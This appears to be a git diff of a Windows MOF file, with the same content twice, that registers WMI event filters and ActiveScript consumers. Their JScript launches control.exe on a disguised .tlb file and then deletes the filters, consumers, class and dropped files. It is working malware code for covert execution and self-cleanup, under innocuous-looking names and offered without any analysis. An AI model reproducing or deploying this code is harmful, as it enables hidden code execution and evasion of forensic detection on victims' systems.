misterch0c · April 19, 2017 23:18
diff --git a/mof b/mof
 #pragma namespace ("\\\\.\\Root\\cimv2")

 class MSClassConsumer71
 {
  [key] string Name;
 };

 class ActiveScriptEventConsumer : __EventConsumer
 {
  [key] string Name;
  [not_null] string ScriptingEngine;
  [Template] string ScriptText;
  string ScriptFilename;
  uint32 KillTimeout = 0;
 };

 instance of __Win32Provider as $P
 {
  Name = "ActiveScriptEventConsumer";
  Clsid = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
  PerUserInitialization = TRUE;
 };

 instance of __EventConsumerProviderRegistration
 {
  Provider = $P;
  ConsumerClassNames = {"ActiveScriptEventConsumer"};
 };

 instance of ActiveScriptEventConsumer as $Cons
 {
 Name = "ACEVNTBX";
 ScriptingEngine = "JScript";
 ScriptText = "\n"
 "try {var s = new ActiveXObject(\"Wscript.Shell\");\n"
 "s.Run(\"\\\\windows\\\\system32\\\\control.exe \\\\windows\\\\system32\\\\wbem\\\\wbemess2.tlb\");} catch (err) {};\n"
 "sv = GetObject(\"winmgmts:root\\\\cimv2\");"
 "try {sv.Delete(\"MSClassConsumer71\");} catch (err) {};"
 "try {sv.Delete(\"__EventFilter.Name='IEFLTKC'\");} catch (err) {};"
 "try {sv.Delete(\"ActiveScriptEventConsumer.Name='ACEVNTBX'\");} catch(err) {};";
 };

 instance of ActiveScriptEventConsumer as $Cons2
 {

 Name = "AEVNTDG";
 ScriptingEngine = "JScript";
 ScriptText = "\n"
 "var objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\n"
 "try {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\nnetcfg.mof\");\n"
 "f1.Delete(true);} catch(err) {};\n"
 "try {\n"
 "var f2 = objfs.GetFile(\"\\\\windows\\\\system32\\\\wbem\\\\wbemess2.tlb\");\n"
 "try {f2.Delete(true); } catch(err) {};\n"
 "var s = GetObject(\"winmgmts:root\\\\cimv2\");"
 "try {s.Delete(\"__EventFilter.Name='IE2FLTGJ'\");} catch (err) {};"
 "try {s.Delete(\"ActiveScriptEventConsumer.Name='AEVNTDG'\"); catch (err) {};\n"
 "} catch(err) {};\n"
 "try {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\evntprv.mof\");\n"
 "f1.Delete(true);} catch(err) {};";
 };

 instance of __EventFilter as $Filt
 {
  Name = "IEFLTKC";
  Query = "SELECT * FROM __InstanceCreationEvent"
    " WHERE TargetInstance.__class = \"MSClassConsumer71\"";
  QueryLanguage = "WQL";
 };

 instance of __EventFilter as $Filt2
 {
  Name = "IE2FLTGJ";
  Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 "
      "WHERE TargetInstance ISA \"Win32_Process\" "
      "AND TargetInstance.Name = \"control.exe\"";
  QueryLanguage = "WQL";
 };

 instance of __FilterToConsumerBinding as $bind
 {
    Filter = $Filt;
    Consumer = $Cons;
 };

 instance of __FilterToConsumerBinding as $bind2
 {
    Filter = $Filt2;
    Consumer = $Cons2;
 };


 instance of MSClassConsumer71 as $myclass
 {
  Name = "ClassConsumer46";
 };
	#pragma namespace ("\\\\.\\Root\\cimv2")

	class MSClassConsumer71
	{
	[key] string Name;
	};

	class ActiveScriptEventConsumer : __EventConsumer
	{
	[key] string Name;
	[not_null] string ScriptingEngine;
	[Template] string ScriptText;
	string ScriptFilename;
	uint32 KillTimeout = 0;
	};

	instance of __Win32Provider as $P
	{
	Name = "ActiveScriptEventConsumer";
	Clsid = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
	PerUserInitialization = TRUE;
	};

	instance of __EventConsumerProviderRegistration
	{
	Provider = $P;
	ConsumerClassNames = {"ActiveScriptEventConsumer"};
	};

	instance of ActiveScriptEventConsumer as $Cons
	{
	Name = "ACEVNTBX";
	ScriptingEngine = "JScript";
	ScriptText = "\n"
	"try {var s = new ActiveXObject(\"Wscript.Shell\");\n"
	"s.Run(\"\\\\windows\\\\system32\\\\control.exe \\\\windows\\\\system32\\\\wbem\\\\wbemess2.tlb\");} catch (err) {};\n"
	"sv = GetObject(\"winmgmts:root\\\\cimv2\");"
	"try {sv.Delete(\"MSClassConsumer71\");} catch (err) {};"
	"try {sv.Delete(\"__EventFilter.Name='IEFLTKC'\");} catch (err) {};"
	"try {sv.Delete(\"ActiveScriptEventConsumer.Name='ACEVNTBX'\");} catch(err) {};";
	};

	instance of ActiveScriptEventConsumer as $Cons2
	{

	Name = "AEVNTDG";
	ScriptingEngine = "JScript";
	ScriptText = "\n"
	"var objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\n"
	"try {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\nnetcfg.mof\");\n"
	"f1.Delete(true);} catch(err) {};\n"
	"try {\n"
	"var f2 = objfs.GetFile(\"\\\\windows\\\\system32\\\\wbem\\\\wbemess2.tlb\");\n"
	"try {f2.Delete(true); } catch(err) {};\n"
	"var s = GetObject(\"winmgmts:root\\\\cimv2\");"
	"try {s.Delete(\"__EventFilter.Name='IE2FLTGJ'\");} catch (err) {};"
	"try {s.Delete(\"ActiveScriptEventConsumer.Name='AEVNTDG'\"); catch (err) {};\n"
	"} catch(err) {};\n"
	"try {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\evntprv.mof\");\n"
	"f1.Delete(true);} catch(err) {};";
	};

	instance of __EventFilter as $Filt
	{
	Name = "IEFLTKC";
	Query = "SELECT * FROM __InstanceCreationEvent"
	" WHERE TargetInstance.__class = \"MSClassConsumer71\"";
	QueryLanguage = "WQL";
	};

	instance of __EventFilter as $Filt2
	{
	Name = "IE2FLTGJ";
	Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 "
	"WHERE TargetInstance ISA \"Win32_Process\" "
	"AND TargetInstance.Name = \"control.exe\"";
	QueryLanguage = "WQL";
	};

	instance of __FilterToConsumerBinding as $bind
	{
	Filter = $Filt;
	Consumer = $Cons;
	};

	instance of __FilterToConsumerBinding as $bind2
	{
	Filter = $Filt2;
	Consumer = $Cons2;
	};


	instance of MSClassConsumer71 as $myclass
	{
	Name = "ClassConsumer46";
	};